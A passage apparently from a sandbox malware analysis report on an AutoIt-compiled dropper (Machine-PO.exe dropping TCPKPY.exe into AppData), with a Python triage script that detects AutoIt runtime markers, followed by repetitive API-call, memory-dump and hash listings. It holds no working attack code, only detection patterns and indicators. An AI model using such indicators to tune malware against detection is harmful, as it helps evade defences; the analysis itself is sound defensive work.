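    "registry_key": "Software\\AutoIt v3\\AutoIt",   # HKCU key read for 'Include'
    "window_class": "AutoIt v3",                      # hidden main window class/title
    "taskbar_msg": "TaskbarCreated",                  # generic tray-icon message, zero weight
}

# Marker preceding the compiled script resource in AutoIt3 executables.
# Assumption: well-known format detail, not something this report shows.
AU3_SCRIPT_MARKER = b"AU3!EA06"


def _find_all(data: bytes, needle: bytes) -> list:
    """Return every offset at which `needle` occurs in `data` (overlaps allowed)."""
    offsets, pos = [], data.find(needle)
    while pos != -1:
        offsets.append(pos)
        pos = data.find(needle, pos + 1)
    return offsets


def find_autoit_indicators(data: bytes) -> dict:
    """Map indicator name -> list of byte offsets where it was found."""
    hits = {}
    for name, text in AUTOIT_INDICATORS.items():
        offsets = _find_all(data, text.encode("utf-16-le"))
        if offsets:
            hits[name] = offsets
    marker_offsets = _find_all(data, AU3_SCRIPT_MARKER)
    if marker_offsets:
        hits["au3_script_marker"] = marker_offsets
    return hits


def classify(hits: dict) -> str:
    """Verdict from the indicator set.

    The registry key and the AU3 marker only occur in the AutoIt runtime; the
    bare class name is weaker (a script author can reuse it); TaskbarCreated is
    ignored because every tray application registers it.
    """
    if "registry_key" in hits or "au3_script_marker" in hits:
        return "autoit-compiled"
    if "window_class" in hits:
        return "possible-autoit"
    return "no-autoit-indicators"


def scan_file(path: str) -> tuple:
    """Scan a file on disk; returns (verdict, hits)."""
    with open(path, "rb") as fh:
        data = fh.read()
    hits = find_autoit_indicators(data)
    return classify(hits), hits


# Constructed sample: a fake image containing the three runtime strings,
# laid out so the offsets are predictable (not bytes from Machine-PO.exe).
SAMPLE_IMAGE = (
    b"MZ" + b"\x00" * 64
    + "Software\\AutoIt v3\\AutoIt".encode("utf-16-le") + b"\x00\x00"
    + b"\x90" * 16
    + "AutoIt v3".encode("utf-16-le") + b"\x00\x00"
    + "TaskbarCreated".encode("utf-16-le") + b"\x00\x00"
)

# Constructed benign sample: a tray application that only registers TaskbarCreated.
BENIGN_IMAGE = b"MZ" + b"\x00" * 32 + "TaskbarCreated".encode("utf-16-le")

if __name__ == "__main__":
    if len(sys.argv) > 1:
        verdict, found = scan_file(sys.argv[1])
    else:
        found = find_autoit_indicators(SAMPLE_IMAGE)
        verdict = classify(found)
    print(verdict)
    for name, offsets in found.items():
        print(f"  {name}: {[hex(o) for o in offsets]}")
```

Run it against the dropped executable with `python autoit_triage.py Machine-PO.exe`; an "autoit-compiled" verdict means the next step is extracting and decompiling the embedded .au3 script rather than reversing the runtime functions listed on this page. Note that "AutoIt v3" also occurs inside the registry key string, so its offset list includes a hit within the key; the verdict logic is unaffected.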

                                                                                                                Control-flow Graph

                                                                                                                Control-flow graph (rendered image not extracted; block summary): entry block 203dcb-203df1 (call 203f9b), second probe 203df7-203e04 (call 203f9b); short path 203e16-203e36 (call 20bdf0); long path through 2739f9-273c7c driven by internal subcalls (22010a, 21ac65, 243460, 20b7ff, 24a5be, 24a5a8, 24a592, 21df5b, 2430ac, 20caee, 2434b4, 242fcd, 24a525, 2432b0, 22017e, 2228ca, 203e39, 205800, 24a46f); no direct Win32 calls appear in the graph itself.
APIs
  • Part of subcall function 00203F9B: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,002034E2,?,00000001), ref: 00203FCD
• _free.LIBCMT ref: 00273C27
• _free.LIBCMT ref: 00273C6E
  • Part of subcall function 0020BDF0: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,002C22E8,?,00000000,?,00203E2E,?,00000000,?,0029DBF0,00000000,?), ref: 0020BE8B
  • Part of subcall function 0020BDF0: GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00203E2E,?,00000000,?,0029DBF0,00000000,?,00000002), ref: 0020BEA7
  • Part of subcall function 0020BDF0: __wsplitpath.LIBCMT ref: 0020BF19
  • Part of subcall function 0020BDF0: _wcscpy.LIBCMT ref: 0020BF31
  • Part of subcall function 0020BDF0: _wcscat.LIBCMT ref: 0020BF46
  • Part of subcall function 0020BDF0: SetCurrentDirectoryW.KERNEL32(?), ref: 0020BF56
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: CurrentDirectory_free$FullLibraryLoadNamePath__wsplitpath_wcscat_wcscpy
• String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error$E<
• API String ID: 1510338132-2925545299
• Opcode ID: 50fd7e5c46a847f973ee07e5c5713a85fae8f93f9339dfd83d0460740f58663f
• Instruction ID: e93c263508a4e4da67bdd15ece796da24a89f9345e38eb80a67fdf0bd6c06794
• Opcode Fuzzy Hash: 50fd7e5c46a847f973ee07e5c5713a85fae8f93f9339dfd83d0460740f58663f
• Instruction Fuzzy Hash: 84916171920219AFCF04EFA4CC929EEB7B4BF09310F50452AF416AB292DB749A25DF50

Control-flow Graph (rendered graph omitted; legend: Executed / Not Executed)
APIs
• SHGetMalloc.SHELL32(1< ), ref: 00203A7D
• SHGetPathFromIDListW.SHELL32(?,?), ref: 00203AD2
• SHGetDesktopFolder.SHELL32(?), ref: 00203A8F
  • Part of subcall function 00203B1E: _wcsncpy.LIBCMT ref: 00203B32
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: DesktopFolderFromListMallocPath_wcsncpy
• String ID: 1<
• API String ID: 3981382179-2457145218
• Opcode ID: 348d2a4fa7b90a39bc006885c5eef602733834f09a752674c01d4d1a712a2810
• Instruction ID: f22751a383914c81bdef7b4a1cdbf9c0c5ccf3ad618e1fc3ce8247ee940de466
• Opcode Fuzzy Hash: 348d2a4fa7b90a39bc006885c5eef602733834f09a752674c01d4d1a712a2810
• Instruction Fuzzy Hash: 78215E76B01218ABCB14DF95DC88DEEB7BDEF88704B1040A8F50AD7291DB709E56CB90
APIs
• RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0021C948,SwapMouseButtons,00000004,?), ref: 0021C979
• RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,0021C948,SwapMouseButtons,00000004,?,?,?,?,0021BF22), ref: 0021C99A
• RegCloseKey.KERNEL32(00000000,?,?,0021C948,SwapMouseButtons,00000004,?,?,?,?,0021BF22), ref: 0021C9BC
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID: Control Panel\Mouse
• API String ID: 3677997916-824357125
• Opcode ID: 607fdf951584907afec1eb4415b85e4bae4d8a55778730311ab7a8add37b57e4
• Instruction ID: 12110bbd3065241611ae3ec0b18e8ef95463ece1d4e5f9a03c1ee0613ce2e3a8
• Opcode Fuzzy Hash: 607fdf951584907afec1eb4415b85e4bae4d8a55778730311ab7a8add37b57e4
• Instruction Fuzzy Hash: 4B117C79561208FFDB218F64DC44EFE77FCEF14750F20445AA841E7210D231AEA49B60
APIs
  • Part of subcall function 002041A7: _fseek.LIBCMT ref: 002041BF
  • Part of subcall function 0024CE59: _wcscmp.LIBCMT ref: 0024CF49
  • Part of subcall function 0024CE59: _wcscmp.LIBCMT ref: 0024CF5C
• _free.LIBCMT ref: 0024CDC9
• _free.LIBCMT ref: 0024CDD0
• _free.LIBCMT ref: 0024CE3B
  • Part of subcall function 002228CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00228715,00000000,002288A3,00224673,?), ref: 002228DE
  • Part of subcall function 002228CA: GetLastError.KERNEL32(00000000,?,00228715,00000000,002288A3,00224673,?), ref: 002228F0
• _free.LIBCMT ref: 0024CE43
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
• String ID:
• API String ID: 1552873950-0
• Opcode ID: 66bc342b584f0e90e8e3921fe03708e5c63b2722386060f4a17f54ef5e71cd11
• Instruction ID: b18f614be5989f3d05b78e2f57792e5f8240296c2d4f194278bc536716731ab0
• Opcode Fuzzy Hash: 66bc342b584f0e90e8e3921fe03708e5c63b2722386060f4a17f54ef5e71cd11
• Instruction Fuzzy Hash: 175153B1D14218AFDF199F68DC81AADB7B9FF48300F1040AEF61DA3291D7715A908F69
APIs
• _memset.LIBCMT ref: 00273CF1
• GetOpenFileNameW.COMDLG32(?,?,00000001,002C22E8), ref: 00273D35
  • Part of subcall function 002031B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 002031DA
  • Part of subcall function 00203A67: SHGetMalloc.SHELL32(1< ), ref: 00203A7D
  • Part of subcall function 00203A67: SHGetDesktopFolder.SHELL32(?), ref: 00203A8F
  • Part of subcall function 00203A67: SHGetPathFromIDListW.SHELL32(?,?), ref: 00203AD2
  • Part of subcall function 00203B45: GetFullPathNameW.KERNEL32(?,00000104,?,?,002C22E8,?), ref: 00203B65
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: NamePath$Full$DesktopFileFolderFromListMallocOpen_memset
• String ID: X
• API String ID: 3714316930-3081909835
• Opcode ID: 50b00e82506c4d6c225f33b9ad07d6dae52c204d1f40f591576ff4cbe6ed0a1d
• Instruction ID: fe3184c5a226e680b6200cda4fa813caac282202858d9d212be5fef7d74d0f1f
• Opcode Fuzzy Hash: 50b00e82506c4d6c225f33b9ad07d6dae52c204d1f40f591576ff4cbe6ed0a1d
• Instruction Fuzzy Hash: AF118D71A202986BCF05DFD4D8055DE7BFDAF46704F00400EE401BB282DBB556598F91
APIs
• __FF_MSGBANNER.LIBCMT ref: 00224603
  • Part of subcall function 00228E52: __NMSG_WRITE.LIBCMT ref: 00228E79
  • Part of subcall function 00228E52: __NMSG_WRITE.LIBCMT ref: 00228E83
• __NMSG_WRITE.LIBCMT ref: 0022460A
  • Part of subcall function 00228EB2: GetModuleFileNameW.KERNEL32(00000000,002C0312,00000104,?,00000001,00220127), ref: 00228F44
  • Part of subcall function 00228EB2: ___crtMessageBoxW.LIBCMT ref: 00228FF2
  • Part of subcall function 00221D65: ___crtCorExitProcess.LIBCMT ref: 00221D6B
  • Part of subcall function 00221D65: ExitProcess.KERNEL32 ref: 00221D74
  • Part of subcall function 0022889E: __getptd_noexit.LIBCMT ref: 0022889E
• RtlAllocateHeap.NTDLL(00BB0000,00000000,00000001,?,?,?,?,00220127,?,0020125D,00000058,?,?), ref: 0022462F
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
• String ID:
• API String ID: 1372826849-0
• Opcode ID: 3bb4575f3ecc36d85123e32984dd436fdaa09652749656da0be2697e81e4cb13
• Instruction ID: cec9b8b9d56b007868a69e302c36843c6461e5b5cf9c99cc98f17782d98fc316
• Opcode Fuzzy Hash: 3bb4575f3ecc36d85123e32984dd436fdaa09652749656da0be2697e81e4cb13
• Instruction Fuzzy Hash: 30019635632232BAE6217FE4BC45B7A334CAF82B61F110125FA05971D1DFF4DC608A65
APIs
• _free.LIBCMT ref: 0024C45E
  • Part of subcall function 002228CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00228715,00000000,002288A3,00224673,?), ref: 002228DE
  • Part of subcall function 002228CA: GetLastError.KERNEL32(00000000,?,00228715,00000000,002288A3,00224673,?), ref: 002228F0
• _free.LIBCMT ref: 0024C46F
• _free.LIBCMT ref: 0024C481
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 409dc5471866d52cb660d3acacbc6baa69eb1666097d1b0fc545827c793d8a90
• Instruction ID: c22a35f75c4cf6d40d47b2281822d4e22238edabea63c4c082165a57d2ac5fa7
• Opcode Fuzzy Hash: 409dc5471866d52cb660d3acacbc6baa69eb1666097d1b0fc545827c793d8a90
• Instruction Fuzzy Hash: 73E0C2A1223712F2CA6CADBD7940BB313CC2F04710B24182DF449D3142CF2CE8608434
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: CALL
                                                                                                                • API String ID: 0-4196123274
                                                                                                                • Opcode ID: 5917e3d93a2c90adb9e6ed89f15cce6f7eb4d4e30a6c9ceba630aa34125362b8
                                                                                                                • Instruction ID: 606aa2fed106fa00cab2879bd0009d332a43806ad96ecddbaab01bd2d0510223
                                                                                                                • Opcode Fuzzy Hash: 5917e3d93a2c90adb9e6ed89f15cce6f7eb4d4e30a6c9ceba630aa34125362b8
                                                                                                                • Instruction Fuzzy Hash: F522AD70528341DFD728DF14C490B6AB7E1BF98304F15895DE99A8B2A2C7B1E8E4CF42
                                                                                                                APIs
                                                                                                                  • Part of subcall function 002016F2: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,002014EB), ref: 00201751
                                                                                                                • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0020159B
                                                                                                                • CoInitialize.OLE32(00000000), ref: 00201612
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 002758F7
                                                                                                                Similarity
                                                                                                                • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3815369404-0
                                                                                                                • Opcode ID: 35e3d6afc07dbe49017cb9c00c2ec06b6e3ef6ba253bbc5bf29c0f466c9d0484
                                                                                                                • Instruction ID: 2cd94d5eec9a0d0fc0aaede7a9d26a0fe05aabe7c3246a34ebf088624e96d1ab
                                                                                                                • Opcode Fuzzy Hash: 35e3d6afc07dbe49017cb9c00c2ec06b6e3ef6ba253bbc5bf29c0f466c9d0484
                                                                                                                • Instruction Fuzzy Hash: 57719EB49113418BC328DF5AB89BD55BBA8FB5B344394426ED00A873A3CB708474CF55
                                                                                                                Similarity
                                                                                                                • API ID: _memmove
                                                                                                                • String ID: EA06
                                                                                                                • API String ID: 4104443479-3962188686
                                                                                                                • Opcode ID: ca6a7f8f326d0f518d674cb413b50dc7b334eacb5b1c560d0b7962b7f94844ef
                                                                                                                • Instruction ID: f91b089b0048c563cba15002892d3824cf2b8b2fe1061ec5a00da22ff32a07f3
                                                                                                                • Opcode Fuzzy Hash: ca6a7f8f326d0f518d674cb413b50dc7b334eacb5b1c560d0b7962b7f94844ef
                                                                                                                • Instruction Fuzzy Hash: AA419DF1A343589BCB15BF5488517BEBF638B15300F18C465EB86B71C3C6619EB48BA1
                                                                                                                Strings
                                                                                                                • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 002734AA
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                                                                                • API String ID: 1029625771-2684727018
                                                                                                                • Opcode ID: 67af8025e150585e97225ba68e659c4237fcc29ef8db1d28c3b8ca358a470587
                                                                                                                • Instruction ID: 9956b1c71b35e6869af7312f46496449838f5d3dabe77b7f8b16ce18b6523517
                                                                                                                • Opcode Fuzzy Hash: 67af8025e150585e97225ba68e659c4237fcc29ef8db1d28c3b8ca358a470587
                                                                                                                • Instruction Fuzzy Hash: 85F0F47192520DAACF15EEB4D8919FFB7BCAE10310B108526E81592183EB759B29DB21
                                                                                                                APIs
                                                                                                                • IsWindow.USER32(00000000), ref: 0027DB31
                                                                                                                • IsWindow.USER32(00000000), ref: 0027DB6B
                                                                                                                  • Part of subcall function 00201F04: GetForegroundWindow.USER32 ref: 00201FBE
                                                                                                                Similarity
                                                                                                                • API ID: Window$Foreground
                                                                                                                • String ID:
                                                                                                                • API String ID: 62970417-0
                                                                                                                • Opcode ID: e43b84fb0b02542c5db59dbfa054940248ae04473e7c97c934d54a937cbd9aae
                                                                                                                • Instruction ID: 7e83e349250c880d1d7aeb0b8dd13e3c1beb69beb3251876d91c927034257db7
                                                                                                                • Opcode Fuzzy Hash: e43b84fb0b02542c5db59dbfa054940248ae04473e7c97c934d54a937cbd9aae
                                                                                                                • Instruction Fuzzy Hash: 0621DF72220306AFDB11AF74C885BFE77AD9F80784F004429F95A87182DB70EE259B60
                                                                                                                APIs
                                                                                                                • IsThemeActive.UXTHEME ref: 002036E6
                                                                                                                  • Part of subcall function 00222025: __lock.LIBCMT ref: 0022202B
                                                                                                                  • Part of subcall function 002032DE: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 002032F6
                                                                                                                  • Part of subcall function 002032DE: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0020330B
                                                                                                                  • Part of subcall function 0020374E: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 0020376D
                                                                                                                  • Part of subcall function 0020374E: IsDebuggerPresent.KERNEL32(?,?), ref: 0020377F
                                                                                                                  • Part of subcall function 0020374E: GetFullPathNameW.KERNEL32(C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe,00000104,?,002C1120,C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe,002C1124,?,?), ref: 002037EE
                                                                                                                  • Part of subcall function 0020374E: SetCurrentDirectoryW.KERNEL32(?), ref: 00203860
                                                                                                                • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 00203726
                                                                                                                Similarity
                                                                                                                • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                                                                                • String ID:
                                                                                                                • API String ID: 924797094-0
                                                                                                                • Opcode ID: 8200e3b63acaac597a793a56018254d675b7a81f8ae5b74bbbd186c26caf75fb
                                                                                                                • Instruction ID: 7ab60933cbec7b44de46422f233f8a4697e50a64fb1830f94b5af5c756495517
                                                                                                                • Opcode Fuzzy Hash: 8200e3b63acaac597a793a56018254d675b7a81f8ae5b74bbbd186c26caf75fb
                                                                                                                • Instruction Fuzzy Hash: D5118E71918341EBC310DF65E84991ABBE9FF95710F40451EF844872B2EB7499A8CF92
                                                                                                                APIs
                                                                                                                • ___lock_fhandle.LIBCMT ref: 0022F7D9
                                                                                                                • __close_nolock.LIBCMT ref: 0022F7F2
                                                                                                                  • Part of subcall function 0022886A: __getptd_noexit.LIBCMT ref: 0022886A
                                                                                                                  • Part of subcall function 0022889E: __getptd_noexit.LIBCMT ref: 0022889E
                                                                                                                Similarity
                                                                                                                • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                                                                • String ID:
                                                                                                                • API String ID: 1046115767-0
                                                                                                                • Opcode ID: ecf5504f4ba1e808fca45b2ad479649c9b53529fb2cd10b6f81bda019d2ecfa5
                                                                                                                • Instruction ID: 2e073762f9b910907d4c22804054e9b9c2b7db2ff0c29136bffcf83951419526
                                                                                                                • Opcode Fuzzy Hash: ecf5504f4ba1e808fca45b2ad479649c9b53529fb2cd10b6f81bda019d2ecfa5
                                                                                                                • Instruction Fuzzy Hash: 87117032836674BED7517FE4BA46358B6705F42331F560370E5606B2E2CBF89D608AA2
                                                                                                                APIs
                                                                                                                  • Part of subcall function 002245EC: __FF_MSGBANNER.LIBCMT ref: 00224603
                                                                                                                  • Part of subcall function 002245EC: __NMSG_WRITE.LIBCMT ref: 0022460A
                                                                                                                  • Part of subcall function 002245EC: RtlAllocateHeap.NTDLL(00BB0000,00000000,00000001,?,?,?,?,00220127,?,0020125D,00000058,?,?), ref: 0022462F
                                                                                                                • std::exception::exception.LIBCMT ref: 0022013E
                                                                                                                • __CxxThrowException@8.LIBCMT ref: 00220153
                                                                                                                  • Part of subcall function 00227495: RaiseException.KERNEL32(?,?,0020125D,002B6598,?,?,?,00220158,0020125D,002B6598,?,00000001), ref: 002274E6
                                                                                                                Similarity
                                                                                                                • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                • String ID:
                                                                                                                • API String ID: 3902256705-0
                                                                                                                • Opcode ID: 0a3a1e875ab327339896ef7ebe1d0ffcf4c3d4d7e07e29d896c9c00807b5f793
                                                                                                                • Instruction ID: ef57fb416c9c044f55adc274f40a994ed9b2cb84bda1dd92ed01cd663bbecfa6
                                                                                                                • Opcode Fuzzy Hash: 0a3a1e875ab327339896ef7ebe1d0ffcf4c3d4d7e07e29d896c9c00807b5f793
                                                                                                                • Instruction Fuzzy Hash: 89F0A43912823EB6C715BEE8F8429DEB7ECAF04350F500415F908961D2DBB09AB49BA5
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0022889E: __getptd_noexit.LIBCMT ref: 0022889E
                                                                                                                • __lock_file.LIBCMT ref: 002242B9
                                                                                                                  • Part of subcall function 00225A9F: __lock.LIBCMT ref: 00225AC2
                                                                                                                • __fclose_nolock.LIBCMT ref: 002242C4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                • String ID:
                                                                                                                • API String ID: 2800547568-0
                                                                                                                • Opcode ID: f638e4a79d55984835245af045d1059b3e5f6d2dfca4d3c9eff93f3ae78dabb2
                                                                                                                • Instruction ID: 1842b09e258cf7933cb07f1585f96fb317e45defb9b1a540d1bde221981d32aa
                                                                                                                • Opcode Fuzzy Hash: f638e4a79d55984835245af045d1059b3e5f6d2dfca4d3c9eff93f3ae78dabb2
                                                                                                                • Instruction Fuzzy Hash: 3FF06D31935635FAE720BBF6A80275EA7E06F41334F25830ABC249A1C1CBBC99219F51
                                                                                                                APIs
                                                                                                                • ___crtCorExitProcess.LIBCMT ref: 00221D6B
                                                                                                                  • Part of subcall function 00221D33: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,0028ED50,?,?,00221D70,00220127,?,00228A37,000000FF,0000001E,002B68C8,00000008,0022899B,00220127,00220127), ref: 00221D42
                                                                                                                  • Part of subcall function 00221D33: GetProcAddress.KERNEL32(0028ED50,CorExitProcess), ref: 00221D54
                                                                                                                • ExitProcess.KERNEL32 ref: 00221D74
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                                • String ID:
                                                                                                                • API String ID: 2427264223-0
                                                                                                                • Opcode ID: 9e9193bf0232e7c49de66b60bd3fac19bb28cd1a49119d38e2d62838ce44d014
                                                                                                                • Instruction ID: 4ab2cb98947c9d1034523e32ec5929fde5ade588f85b51f8a692525d9c89d83e
                                                                                                                • Opcode Fuzzy Hash: 9e9193bf0232e7c49de66b60bd3fac19bb28cd1a49119d38e2d62838ce44d014
                                                                                                                • Instruction Fuzzy Hash: B4B09230000108BBCB012F51ED0A8493F2AEB50390B008024F80408071DBB2AAA19EC1
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 4104443479-0
                                                                                                                • Opcode ID: 1881b95582f27488270194163bdcf0f55d1034154a259e89151eb0eef9976d72
